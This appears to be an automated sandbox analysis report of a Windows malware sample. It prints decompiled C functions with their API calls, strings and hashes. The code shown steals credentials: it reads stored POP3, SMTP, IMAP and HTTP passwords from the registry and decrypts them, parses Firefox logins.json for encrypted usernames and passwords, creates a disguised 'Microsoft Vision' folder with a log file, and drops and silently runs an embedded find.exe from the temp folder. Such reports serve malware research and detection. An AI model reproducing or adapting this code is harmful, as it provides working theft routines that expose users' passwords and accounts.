                                  • Opcode Fuzzy Hash: 7f47958bac4a6e5bb76ade14613cb2583ff2f16c54ab432812a73e7ecd254522
                                  • Instruction Fuzzy Hash: 8C71A730355704ABD224FB62CD62E9A37A9EF89704F10443EF5166B2E1CFB96841CB9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408D0F, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 214windowstringregistryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E00408D0F(void* __ecx, void* __eflags, void* _a4) {
				short _v544;
				char _v696;
				short _v704;
				char _v724;
				struct tagMSG _v748;
				struct _WNDCLASSW _v788;
				struct _SYSTEMTIME _v804;
				char _v808;
				void* _v812;
				long _v816;
				intOrPtr _t46;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr _t65;
				struct HWND__* _t69;
				int _t73;
				intOrPtr _t94;
				void* _t95;
				intOrPtr _t99;
				void* _t107;
				void* _t110;
				struct HINSTANCE__* _t111;
				struct HWND__* _t112;
				void* _t114;
				signed int _t119;
				intOrPtr _t122;
				intOrPtr _t125;
				intOrPtr _t129;
				intOrPtr _t131;
				void* _t132;
				void* _t133;
				void* _t140;
				signed int _t143;
				signed int _t144;
				signed int _t146;
				void* _t150;

				_t114 = __ecx;
				_t111 = GetModuleHandleA(0);
				_v788.hIcon = 0;
				_v804.wSecond = 0;
				asm("xorps xmm0, xmm0");
				asm("stosd");
				asm("movlpd [esp+0x30], xmm0");
				asm("movlpd [esp+0x3c], xmm0");
				asm("stosd");
				asm("movlpd [esp+0x44], xmm0");
				asm("stosd");
				asm("stosd");
				_t46 =  *0x42675c; // 0x0
				E00401052(_t46 + 0x210, 0, 0x800);
				_t49 =  *0x42675c; // 0x0
				E00401052(_t49 + 0x10, 0, 0x208);
				_t52 =  *0x42675c; // 0x0
				_t150 = (_t146 & 0xfffffff8) - 0x314 + 0x18;
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t52 + 0x10, _t133, _t140, _t110);
				_t54 =  *0x42675c; // 0x0
				lstrcatW(_t54 + 0x10, L"\\Microsoft Vision\\");
				_t57 =  *0x42675c; // 0x0
				CreateDirectoryW(_t57 + 0x10, 0);
				_t60 =  *0x42675c; // 0x0
				_t153 =  *((intOrPtr*)(_t60 + 0xa14));
				if( *((intOrPtr*)(_t60 + 0xa14)) != 0) {
					E00401052( &_v544, 0, 0x208);
					_t99 =  *0x42675c; // 0x0
					_t150 = _t150 + 0xc;
					lstrcpyW( &_v544, _t99 + 0x10);
					lstrcatW( &_v544, "*");
					E004036F7(_t150,  &_v544);
					_t107 = E00411446( &_v724, _t153, _t114);
					_t129 =  *0x42675c; // 0x0
					E00401FB7(_t129 + 0xa18, _t153, _t107);
					_t131 = _v748.pt;
					_t154 = _t131;
					if(_t131 != 0) {
						E00401B27(_t131, _t131);
					}
				}
				_t132 = 4;
				_t143 = E004035B9( &_v808, _t132, _t154);
				E00403447(E0040357C( &_v812, _t132, _t154, L"ExplorerIdentifier"), _t154, _t143);
				E00405FEB(_v816);
				_t65 =  *0x42675c; // 0x0
				_v816 = 0;
				if( *((intOrPtr*)(_t65 + 0xa14)) != 0) {
					GetLocalTime( &_v804);
					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
					_t122 =  *0x42675c; // 0x0
					_t150 = _t150 + 0x20;
					_t26 = _t122 + 0x10; // 0x10
					E0040357C(E0040357C(_t122 + 0xc, _t132, _t122 + 0xc, _t26), _t132, _t122 + 0xc,  &_v696);
					_t94 =  *0x42675c; // 0x0
					_t95 = CreateFileW( *(_t94 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
					_t125 =  *0x42675c; // 0x0
					 *(_t125 + 4) = _t95;
					CloseHandle(_t95);
				}
				_v788.lpszClassName = _v812;
				_v788.lpfnWndProc = E00408793;
				_v788.hInstance = _t111;
				RegisterClassW( &_v788);
				_t69 = CreateWindowExW(0, _v788.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _t111, _a4);
				_t119 = 7;
				_t112 = _t69;
				memset( &_v748, 0, _t119 << 2);
				_t73 = GetMessageA( &_v748, _t112, 0, 0);
				if(_t73 == 0) {
					L9:
					_t144 = _v748.wParam;
					goto L10;
				} else {
					_t144 = _t143 | 0xffffffff;
					while(_t73 != _t144) {
						TranslateMessage( &_v748);
						DispatchMessageA( &_v748);
						_t73 = GetMessageA( &_v748, _t112, 0, 0);
						if(_t73 != 0) {
							continue;
						}
						goto L9;
					}
					L10:
					E00405FEB(_v812);
					return _t144;
				}
			}










































                                  0x00408d0f
                                  0x00408d27
                                  0x00408d29
                                  0x00408d2f
                                  0x00408d37
                                  0x00408d3a
                                  0x00408d40
                                  0x00408d46
                                  0x00408d4c
                                  0x00408d4d
                                  0x00408d53
                                  0x00408d54
                                  0x00408d55
                                  0x00408d63
                                  0x00408d68
                                  0x00408d7a
                                  0x00408d7f
                                  0x00408d84
                                  0x00408d90
                                  0x00408d96
                                  0x00408daa
                                  0x00408dac
                                  0x00408db6
                                  0x00408dbc
                                  0x00408dc1
                                  0x00408dc7
                                  0x00408dd7
                                  0x00408ddc
                                  0x00408de1
                                  0x00408df0
                                  0x00408e03
                                  0x00408e10
                                  0x00408e19
                                  0x00408e1f
                                  0x00408e2c
                                  0x00408e31
                                  0x00408e35
                                  0x00408e37
                                  0x00408e3a
                                  0x00408e3a
                                  0x00408e37
                                  0x00408e41
                                  0x00408e54
                                  0x00408e5e
                                  0x00408e67
                                  0x00408e6c
                                  0x00408e71
                                  0x00408e7b
                                  0x00408e86
                                  0x00408ebd
                                  0x00408ec3
                                  0x00408ed0
                                  0x00408ed4
                                  0x00408ee2
                                  0x00408ee7
                                  0x00408eff
                                  0x00408f05
                                  0x00408f0c
                                  0x00408f0f
                                  0x00408f0f
                                  0x00408f19
                                  0x00408f22
                                  0x00408f2a
                                  0x00408f2e
                                  0x00408f46
                                  0x00408f4e
                                  0x00408f4f
                                  0x00408f59
                                  0x00408f67
                                  0x00408f6b
                                  0x00408f9a
                                  0x00408f9a
                                  0x00000000
                                  0x00408f6d
                                  0x00408f6d
                                  0x00408f70
                                  0x00408f79
                                  0x00408f84
                                  0x00408f94
                                  0x00408f98
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00408f98
                                  0x00408f9e
                                  0x00408fa2
                                  0x00408faf
                                  0x00408faf

                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00408D21
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00408D90
                                  • lstrcatW.KERNEL32 ref: 00408DAA
                                  • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 00408DB6
                                  • lstrcpyW.KERNEL32(?,-00000010), ref: 00408DF0
                                  • lstrcatW.KERNEL32 ref: 00408E03
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00411446: FindFirstFileW.KERNEL32(?,?,?,?), ref: 00411473
                                  • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 00408E86
                                  • wsprintfW.USER32 ref: 00408EBD
                                  • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00408EFF
                                  • CloseHandle.KERNEL32(00000000), ref: 00408F0F
                                  • RegisterClassW.USER32 ref: 00408F2E
                                  • CreateWindowExW.USER32 ref: 00408F46
                                  • GetMessageA.USER32 ref: 00408F67
                                  • TranslateMessage.USER32 ref: 00408F79
                                  • DispatchMessageA.USER32 ref: 00408F84
                                  • GetMessageA.USER32 ref: 00408F94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
                                  • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                  • API String ID: 2678186124-2372768292
                                  • Opcode ID: 4e13b100e2b3fe66040d78225b473c357b4793047b4bceb166c70d05fad76bb2
                                  • Instruction ID: 5c496a3f65fd177ded775e206ced170c84e42a303c2806b3eceb831f6cf01448
                                  • Opcode Fuzzy Hash: 4e13b100e2b3fe66040d78225b473c357b4793047b4bceb166c70d05fad76bb2
                                  • Instruction Fuzzy Hash: 51718172604304ABC320DBA5DC45EABB7FCEB89704F00492EF685E3291DB39D945CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004099FF, Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 296registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E004099FF(void* __ecx, void* __edx, void* __eflags, void* _a4) {
				int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v292;
				char _v556;
				char _v820;
				char _v9012;
				char _v17204;
				long _t124;
				long _t130;
				long _t136;
				long _t142;
				void* _t180;
				void* _t181;
				void* _t199;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;

				_t199 = __edx;
				_t181 = __ecx;
				E004011C0(0x4334, __ecx);
				_v8 = 0x1000;
				_v24 = 0;
				_v20 = 0;
				_t180 = _t181;
				_v16 = 0;
				E00401052( &_v292, 0, 0x104);
				E00401052( &_v556, 0, 0x104);
				E00401052( &_v820, 0, 0x104);
				E00401052( &_v9012, 0, _v8);
				_t207 = _a4;
				_t209 = _t208 + 0x30;
				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
					E00403411( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t210 = _t209 + 0xc;
				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
					E00403411( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t211 = _t210 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E00403411( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t212 = _t211 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
					E00403411( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t213 = _t212 + 0xc;
				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E00403411( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t214 = _t213 + 0xc;
				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
				_t225 = _t124;
				if(_t124 == 0) {
					E00401052( &_v17204, _t124, 0x1000);
					E00409D97( &_v9012,  &_v17204, _t225, _v8);
					_t214 = _t214 + 0x10;
					E00403411( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t215 = _t214 + 0xc;
				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
				_t226 = _t130;
				if(_t130 == 0) {
					E00401052( &_v17204, _t130, 0x1000);
					E00409D97( &_v9012,  &_v17204, _t226, _v8);
					_t215 = _t215 + 0x10;
					E00403411( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t216 = _t215 + 0xc;
				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
				_t227 = _t136;
				if(_t136 == 0) {
					E00401052( &_v17204, _t136, 0x1000);
					E00409D97( &_v9012,  &_v17204, _t227, _v8);
					_t216 = _t216 + 0x10;
					E00403411( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t217 = _t216 + 0xc;
				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
				_t228 = _t142;
				if(_t142 == 0) {
					E00401052( &_v17204, _t142, 0x1000);
					E00409D97( &_v9012,  &_v17204, _t228, _v8);
					_t217 = _t217 + 0x10;
					E00403411( &_v16,  &_v17204,  &_v17204);
				}
				_v12 = 3;
				if(E00403373( &_v24) > 0) {
					E00401FF2(_t217 - 0x10,  &_v24);
					E00402028(_t180);
				}
				E00401441( &_v24);
				return 1;
			}































                                  0x004099ff
                                  0x004099ff
                                  0x00409a07
                                  0x00409a11
                                  0x00409a1d
                                  0x00409a27
                                  0x00409a2c
                                  0x00409a2e
                                  0x00409a31
                                  0x00409a3f
                                  0x00409a4d
                                  0x00409a5d
                                  0x00409a62
                                  0x00409a68
                                  0x00409a85
                                  0x00409a91
                                  0x00409a91
                                  0x00409aa1
                                  0x00409aab
                                  0x00409ab0
                                  0x00409acc
                                  0x00409ad8
                                  0x00409ad8
                                  0x00409ae3
                                  0x00409aef
                                  0x00409af4
                                  0x00409b10
                                  0x00409b1c
                                  0x00409b1c
                                  0x00409b27
                                  0x00409b33
                                  0x00409b38
                                  0x00409b54
                                  0x00409b60
                                  0x00409b60
                                  0x00409b6b
                                  0x00409b77
                                  0x00409b7c
                                  0x00409b98
                                  0x00409ba4
                                  0x00409ba4
                                  0x00409baf
                                  0x00409bbb
                                  0x00409bc0
                                  0x00409bd8
                                  0x00409bda
                                  0x00409bdc
                                  0x00409beb
                                  0x00409bff
                                  0x00409c04
                                  0x00409c11
                                  0x00409c11
                                  0x00409c1c
                                  0x00409c28
                                  0x00409c2d
                                  0x00409c45
                                  0x00409c47
                                  0x00409c49
                                  0x00409c58
                                  0x00409c6c
                                  0x00409c71
                                  0x00409c7e
                                  0x00409c7e
                                  0x00409c89
                                  0x00409c95
                                  0x00409c9a
                                  0x00409cb2
                                  0x00409cb4
                                  0x00409cb6
                                  0x00409cc5
                                  0x00409cd9
                                  0x00409cde
                                  0x00409ceb
                                  0x00409ceb
                                  0x00409cf6
                                  0x00409d02
                                  0x00409d07
                                  0x00409d1f
                                  0x00409d21
                                  0x00409d23
                                  0x00409d32
                                  0x00409d46
                                  0x00409d4b
                                  0x00409d58
                                  0x00409d58
                                  0x00409d60
                                  0x00409d6e
                                  0x00409d79
                                  0x00409d80
                                  0x00409d80
                                  0x00409d88
                                  0x00409d94

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,74A345DD,767130EA,00000000,?,004099C3), ref: 00409A81
                                  • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,74A345DD,767130EA), ref: 00409AC8
                                  • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 00409B0C
                                  • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 00409B50
                                  • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 00409B94
                                  • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 00409BD8
                                  • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 00409C45
                                  • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 00409CB2
                                  • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 00409D1F
                                    • Part of subcall function 00409D97: GlobalAlloc.KERNEL32(00000040,-00000001,74A345FD,?,?,?,00409D4B,00001000,?,00000000,00001000), ref: 00409DB5
                                    • Part of subcall function 00409D97: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409D4B), ref: 00409DEB
                                    • Part of subcall function 00409D97: lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00409E22
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                  • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                  • API String ID: 6593746-2537589853
                                  • Opcode ID: cc5f769d671623cbfaa9f0c516c5158cd819fe66edd51a48f4d1e9d80896eb4f
                                  • Instruction ID: 7120254dbc2b6b4f3800d12c0dea7aeb6369d048fca86938223c4741ea706cc6
                                  • Opcode Fuzzy Hash: cc5f769d671623cbfaa9f0c516c5158cd819fe66edd51a48f4d1e9d80896eb4f
                                  • Instruction Fuzzy Hash: FFA11EB291011DAADB25EB91CD45FEF737CAF54744F1000BAF605F61C1EA78AB448BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00415169, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 119filestringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E00415169(void* __ecx, void* __eflags, long _a4) {
				intOrPtr* _v8;
				long _v12;
				struct _SHELLEXECUTEINFOA _v72;
				char _v1096;
				char _v2120;
				char _v3144;
				void* _t38;
				void* _t40;
				void* _t83;

				_t75 =  *_a4;
				_t68 = __ecx + 4;
				_v8 = __ecx + 4;
				E00403549(_t68, E00413441( *_a4 + 4,  *_t75));
				E00405FEB(_a4);
				_t38 = LoadResource(0, _a4);
				_a4 = SizeofResource(0, _a4);
				_t40 = LockResource(_t38);
				E00401052( &_v1096, 0, 0x400);
				E00401052( &_v2120, 0, 0x400);
				GetTempPathA(0x400,  &_v1096);
				lstrcatA( &_v1096, "find.exe");
				GetTempPathA(0x400,  &_v2120);
				lstrcatA( &_v2120, "find.db");
				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
				WriteFile(_t83, _t40, _a4,  &_v12, 0);
				CloseHandle(_t83);
				E00401052( &_v3144, 0, 0x400);
				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
				_v72.cbSize = 0x3c;
				_v72.lpFile =  &_v1096;
				_v72.fMask = 0x40;
				asm("xorps xmm0, xmm0");
				_v72.lpParameters =  &_v3144;
				asm("movlpd [ebp-0x20], xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				asm("movlpd [ebp-0x10], xmm0");
				_v72.hwnd = 0;
				_v72.lpVerb = 0;
				_v72.lpDirectory = 0;
				_v72.nShow = 0;
				_v72.hInstApp = 0;
				return ShellExecuteExA( &_v72);
			}












                                  0x00415178
                                  0x0041517a
                                  0x00415180
                                  0x00415191
                                  0x00415199
                                  0x004151a4
                                  0x004151b7
                                  0x004151ba
                                  0x004151d0
                                  0x004151de
                                  0x004151f4
                                  0x00415208
                                  0x00415216
                                  0x00415224
                                  0x00415246
                                  0x00415251
                                  0x00415258
                                  0x0041526b
                                  0x00415288
                                  0x00415294
                                  0x0041529b
                                  0x004152a7
                                  0x004152ae
                                  0x004152b1
                                  0x004152b7
                                  0x004152bd
                                  0x004152c2
                                  0x004152c7
                                  0x004152ca
                                  0x004152cd
                                  0x004152d0
                                  0x004152d3
                                  0x004152e0

                                  APIs
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • LoadResource.KERNEL32(00000000,?,00000000), ref: 004151A4
                                  • SizeofResource.KERNEL32(00000000,?), ref: 004151B0
                                  • LockResource.KERNEL32(00000000), ref: 004151BA
                                  • GetTempPathA.KERNEL32(00000400,?), ref: 004151F4
                                  • lstrcatA.KERNEL32(?,find.exe), ref: 00415208
                                  • GetTempPathA.KERNEL32(00000400,?), ref: 00415216
                                  • lstrcatA.KERNEL32(?,find.db), ref: 00415224
                                  • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 0041523F
                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00415251
                                  • CloseHandle.KERNEL32(00000000), ref: 00415258
                                  • wsprintfA.USER32 ref: 00415288
                                  • ShellExecuteExA.SHELL32(0000003C), ref: 004152D6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                  • String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
                                  • API String ID: 2504251837-265381321
                                  • Opcode ID: c968e0a10a2c1637be2f7f2b00f5e3c21a02e84e25c142268a7a615d38930b4a
                                  • Instruction ID: a64ecab57c3cf55662885f0afd46cea5e91dac6a4cbb1ef5118ba8298ebcf816
                                  • Opcode Fuzzy Hash: c968e0a10a2c1637be2f7f2b00f5e3c21a02e84e25c142268a7a615d38930b4a
                                  • Instruction Fuzzy Hash: C7411FB190021DABDB10DFA5DD85EDEBBBCFF89304F108166F609A2150DB749A858FA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A36F, Relevance: 28.4, APIs: 5, Strings: 11, Instructions: 406filestringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E0040A36F(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				WCHAR* _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				long _v92;
				int _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				void* _v116;
				int _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				int _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				char* _t165;
				void* _t167;
				int _t189;
				int _t190;
				int _t193;
				int _t207;
				WCHAR* _t215;
				void* _t217;
				int _t221;
				void* _t230;
				void* _t236;
				void* _t242;
				int _t281;
				int _t283;
				char* _t293;
				char* _t325;
				void* _t386;
				long _t389;
				intOrPtr _t391;
				intOrPtr _t392;
				WCHAR* _t393;
				int _t394;
				void* _t395;
				void* _t396;
				void* _t397;

				_t397 = __eflags;
				_t392 = __ecx;
				_v32 = __ecx;
				E004036F7( &_v24, L"Profile");
				_t281 = 0;
				E00401052( &_v1224, 0, 0x208);
				_t396 = _t395 + 0xc;
				_v92 = 0;
				_t389 = 0;
				E00401052( &_v704, 0, 0x104);
				_t385 =  &_v704;
				if(E0040B87D(L"firefox.exe",  &_v704, _t397) != 0) {
					_t293 =  &_v44;
					E004036F7(_t293,  &_v704);
					lstrcatW( &_v704, L"\\firefox.exe");
					GetBinaryTypeW( &_v704,  &_v92);
					_t399 = _v92 - 6;
					_t165 =  &_v44;
					if(_v92 != 6) {
						_push(0);
					} else {
						_push(1);
					}
					_push(_t293);
					E0040373F(_t396, _t165);
					_t167 = E0040B165(_t392, _t385, _t399);
					_t400 = _t167;
					if(_t167 != 0) {
						E0040357C( &_a4, _t385, _t400, L"\\Mozilla\\Firefox\\");
						E0040373F( &_v36,  &_a4);
						E0040357C( &_v36, _t385, _t400, L"profiles.ini");
						E00403549( &_v24, E004036F7( &_v40, L"Profile"));
						E00405FEB(_v40);
						E00403384( &_v24, _t385, _t400, _t281);
						while(GetPrivateProfileStringW(_v24, L"Path", _t281,  &_v1224, 0x104, _v36) != 0) {
							_t389 = _t389 + 1;
							_v40 = _t389;
							E00403549( &_v24, E004036F7( &_v96, L"Profile"));
							E00405FEB(_v96);
							_v96 = _t281;
							E00403384( &_v24, _t385, __eflags, _t389);
							E0040373F( &_v12,  &_a4);
							E0040357C( &_v12, _t385, __eflags,  &_v1224);
							E00403666( &_v12,  &_v28);
							_t189 =  *((intOrPtr*)(_t392 + 0x68))(_v28);
							__eflags = _t189;
							if(_t189 == 0) {
								_t190 =  *((intOrPtr*)(_t392 + 0x80))();
								_v156 = _t190;
								__eflags = _t190;
								if(_t190 == 0) {
									goto L7;
								} else {
									_t193 =  *((intOrPtr*)(_t392 + 0x7c))(_t190, 1, _t281);
									_t396 = _t396 + 0xc;
									__eflags = _t193;
									if(_t193 != 0) {
										goto L7;
									} else {
										E0040373F( &_v20,  &_v12);
										E0040357C( &_v20, _t385, __eflags, L"\\logins.json");
										_t386 = 0x1a;
										E00410C8A( &_v16, _t386, __eflags);
										E0040357C( &_v16, _t386, __eflags, "\\");
										_t385 = 8;
										E00403447( &_v16, __eflags, E004035B9( &_v56, _t385, __eflags));
										E00405FEB(_v56);
										_v56 = _t281;
										E0040357C( &_v16, _t385, __eflags, L".tmp");
										_t393 = _v16;
										_t390 = _v20;
										__eflags = CopyFileW(_v20, _t393, _t281);
										if(__eflags != 0) {
											E00403549( &_v20,  &_v16);
											_t390 = _v20;
										}
										E004113ED( &_v184, __eflags);
										_t325 =  &_v180;
										E00403549(_t325,  &_v20);
										_push(_t325);
										_t207 = E004116B1( &_v184, 0xc0000000);
										_t327 =  &_v184;
										__eflags = _t207;
										if(__eflags != 0) {
											_v52 = _t281;
											_v48 = _t281;
											E0041135C( &_v184, _t385,  &_v52, _v164, _t281);
											_t215 = E004034D1( &_v116, "encryptedUsername");
											_t217 = E0040305D( &_v52,  &_v160);
											_t385 = _t215;
											_t283 = E0040961C(_t217, _t215, __eflags);
											_v120 = _t283;
											E00405FEB(_v160);
											_t336 = _v116;
											E00405FEB(_v116);
											__eflags = _t283;
											if(_t283 == 0) {
												_t281 = 0;
												__eflags = 0;
											} else {
												_t391 = _v32;
												_t281 = 0;
												__eflags = 0;
												_t394 = _v120;
												do {
													_v112 = 0;
													_v108 = 0;
													_v104 = 0;
													_t230 = E004034D1( &_v128, "hostname");
													E00409655( &_v88, E0040305D( &_v52,  &_v124), __eflags, _t230, _t394);
													E00405FEB(_v124);
													E00405FEB(_v128);
													_t236 = E004034D1( &_v136, "encryptedUsername");
													E00409655( &_v84, E0040305D( &_v52,  &_v132), __eflags, _t236, _t394);
													E00405FEB(_v132);
													E00405FEB(_v136);
													_t242 = E004034D1( &_v144, "encryptedPassword");
													_t385 = E0040305D( &_v52,  &_v140);
													E00409655( &_v80, _t244, __eflags, _t242, _t394);
													E00405FEB(_v140);
													E00405FEB(_v144);
													E0040A8C3(_t391, __eflags, _v84,  &_v72);
													E0040A8C3(_t391, __eflags, _v80,  &_v76);
													E00403549( &_v112, E004031AF( &_v88, __eflags,  &_v60));
													E00405FEB(_v60);
													_v60 = 0;
													E00403549( &_v108, E004031AF(E004034D1( &_v148, _v72), __eflags,  &_v64));
													E00405FEB(_v64);
													_v64 = 0;
													E00405FEB(_v148);
													E00403549( &_v104, E004031AF(E004034D1( &_v152, _v76), __eflags,  &_v68));
													E00405FEB(_v68);
													_v68 = 0;
													E00405FEB(_v152);
													_t396 = _t396 - 0x10;
													_v100 = 0;
													E00401FF2(_t396,  &_v112);
													E00402028(_t391);
													E00405FEB(_v72);
													E00405FEB(_v76);
													E00405FEB(_v80);
													E00405FEB(_v84);
													E00405FEB(_v88);
													_t336 =  &_v112;
													E00401441( &_v112);
													_t394 = _t394 - 1;
													__eflags = _t394;
												} while (_t394 != 0);
												_t393 = _v16;
												_t390 = _v20;
											}
											_t221 = PathFileExistsW(_t393);
											__eflags = _t221;
											if(_t221 != 0) {
												E0040373F(_t396,  &_v16);
												E0041142A(_t336);
											}
											 *((intOrPtr*)(_v32 + 0x84))(_v156);
											 *((intOrPtr*)(_v32 + 0x6c))();
											E00403148( &_v52);
											_t327 =  &_v184;
										}
										E0041140C(_t327, __eflags);
										E00405FEB(_t393);
										_v16 = _t281;
										E00405FEB(_t390);
										_v20 = _t281;
										E00405FEB(_v28);
										E00405FEB(_v12);
										_t389 = _v40;
										_t392 = _v32;
									}
								}
							} else {
								L7:
								E00405FEB(_v28);
								E00405FEB(_v12);
							}
							_v12 = _t281;
						}
						E0040B10E(_t392);
						_t281 = 1;
						E00405FEB(_v36);
					}
					E00405FEB(_v44);
				}
				E00405FEB(_v24);
				E00405FEB(_a4);
				return _t281;
			}







































































                                  0x0040a36f
                                  0x0040a37b
                                  0x0040a385
                                  0x0040a388
                                  0x0040a392
                                  0x0040a39c
                                  0x0040a3a1
                                  0x0040a3a4
                                  0x0040a3ad
                                  0x0040a3b6
